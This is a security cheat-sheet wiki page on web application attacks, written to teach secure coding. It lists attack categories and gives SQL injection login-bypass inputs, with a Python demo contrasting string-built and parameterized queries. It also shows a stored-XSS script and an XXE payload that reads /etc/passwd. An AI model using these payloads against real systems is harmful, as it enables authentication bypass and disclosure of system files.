web applications attacks - dvanmosselbeen/security-cheat-sheet GitHub Wiki
- Description
- Types of Attacks
  - Attacks based on directories
  - Injections & inclusions
  - Information exposure
  - Authentication, sessions & cookies
  - Data verification & purification
  - Sniffing
  - Buffer overflow & Denial of service (DoS)
- Practical SQLInject Tricks
- Resources

## Description

This article covers common web attacks and aims to make people aware of them so that they can code their applications more securely. Each attack is explained, theoretically and practically, and a way to patch your applications is also given.
Source: https://www.aldeid.com/wiki/Web-applications-attacks

## Types of Attacks

### Attacks based on directories
- Path disclosure
- Directory traversal
- Directory listing
- Predictable files and directories
- .htaccess vulnerabilities

### Injections & inclusions
- XXE
- Cross Site Scripting (XSS)
- Stored XSS
- Cross Site Request Forgery (CSRF or XSRF)
- Cross Site Tracing (XST)
- Local File Inclusion (LFI)
- Remote File Inclusion (RFI)
- SQL Injection
- Command Injection
- Server Side Includes (SSI)

### Information exposure
- HTML comments inspection
- Display errors
- Exceptions exploitation
- Configuration weaknesses
- .htaccess vulnerabilities

### Authentication, sessions & cookies
- Authentication brute-force
- Predictable sessions & session hijacking
- Weak encryption
- Cookie injection / cookie poisoning

### Data verification & purification
- Client-Side vs server-side verifications
- Client Side data
- Data purification
- HTTP splitting

### Sniffing
- Intercept data over the network

### Buffer overflow & Denial of service (DoS)
- Buffer overflow
- Denial of Service (DoS)
- Concurrency

## Practical SQLInject Tricks

Source: https://sechow.com/bricks/docs/login-1.html

User name | Password | SQL Query |
---|---|---|
`tom` | `tom` | `SELECT * FROM users WHERE name='tom' and password='tom'` |
`tom` | `' or '1'='1` | `SELECT * FROM users WHERE name='tom' and password='' or '1'='1'` |
`tom` | `' or 1='1` | `SELECT * FROM users WHERE name='tom' and password='' or 1='1'` |
`tom` | `1' or 1=1 -- -` | `SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -'` |
`' or '1'='1` | `' or '1'='1` | `SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'` |
`' or ' 1=1` | `' or ' 1=1` | `SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'` |
`1' or 1=1 -- -` | `blah` | `SELECT * FROM users WHERE name='1' or 1=1 -- -' and password='blah'` |
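
The rows above work because the login form's fields are pasted into the query text. The following added example (not code from the original page or from Bricks) replays the table's inputs against a string-built query and a parameterized one. It assumes Python's `sqlite3`, a constructed one-row `users` table, and hypothetical function names.

```python
import sqlite3

# (user name, password) pairs copied from the rows of the table above.
ROWS = [
    ("tom", "tom"),
    ("tom", "' or '1'='1"),
    ("tom", "' or 1='1"),
    ("tom", "1' or 1=1 -- -"),
    ("' or '1'='1", "' or '1'='1"),
    ("' or ' 1=1", "' or ' 1=1"),
    ("1' or 1=1 -- -", "blah"),
]

def make_db():
    # Constructed sample data: a single account, tom/tom. The plaintext
    # password column mirrors the table's query; real applications store a hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('tom', 'tom')")
    return db

def login_vulnerable(db, name, password):
    # The fields are pasted into the SQL text, so a quote in the input
    # ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT * FROM users WHERE name='{name}' and password='{password}'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # input broke the syntax: no login, but it reached the parser

def login_parameterized(db, name, password):
    # Placeholders fix the query structure; input is only ever compared as data.
    sql = "SELECT * FROM users WHERE name=? and password=?"
    return db.execute(sql, (name, password)).fetchone() is not None

def compare():
    db = make_db()
    return [(n, p, login_vulnerable(db, n, p), login_parameterized(db, n, p))
            for n, p in ROWS]

if __name__ == "__main__":
    for n, p, vuln, safe in compare():
        print(f"{n!r:18} {p!r:18} string-built={vuln!s:5} parameterized={safe}")
```

On SQLite the third row does not log in through the string-built query, because SQLite does not treat the integer `1` and the text `'1'` as equal. Other engines coerce the types, so the outcome of that row depends on the database.
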

A nice XSS playground on TryHackMe: https://tryhackme.com/room/xss

Stored XSS: a script is stored in the database, and each user visiting the website will execute it.

```html
<script>alert("Warning!!!")</script>
```

With XXE, we can display whatever data we want. This example prints out `falcon feast`.

```xml
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>falcon</firstName>
<lastName>&name;</lastName>
</userInfo>
```

Display the content of a file on the system, in this example the `/etc/passwd` file on a Linux system.

```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
```

## Resources

- OWASP Top 10 Application Security Risks
- CWE/SANS TOP 25 Most Dangerous Software Errors
- Mitre - 2021 CWE Top 25 Most Dangerous Software Weaknesses
- STRIDE and DREAD
- PayloadsAllTheThings - LFI examples